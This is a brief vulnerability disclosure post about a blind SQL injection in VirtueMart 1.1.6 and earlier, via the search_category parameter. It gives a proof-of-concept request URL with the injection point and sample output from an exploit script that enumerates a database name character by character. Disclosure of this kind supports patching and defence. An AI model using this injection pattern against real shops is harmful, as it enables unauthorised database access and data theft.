VirtueMart vulnerability

Blind SQL-Injection

Posted by Andrea Fabrizi on January 31, 2011

VirtueMart <= 1.1.6 is vulnerable to blind SQL Injection affecting the search_category parameter.

POC

http://127.0.0.1/index.php?category_id=&page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand &search_op=and&keyword2=&search_limiter=anywhere&search=Search&search_category=3 AND $BLIND_SQL --

Exploit

$./virtuemart_sql_exploit.sh
- Getting cookies... OK
- Starting enumeration...

1) .............. -> j
2) .................... -> o
3) .................... -> o
4) ................ -> m
5) ............... -> l
6) . -> a
7) .....................................................................

 -> joomla

The exploit is available here

BID: http://www.securityfocus.com/bid/46070/info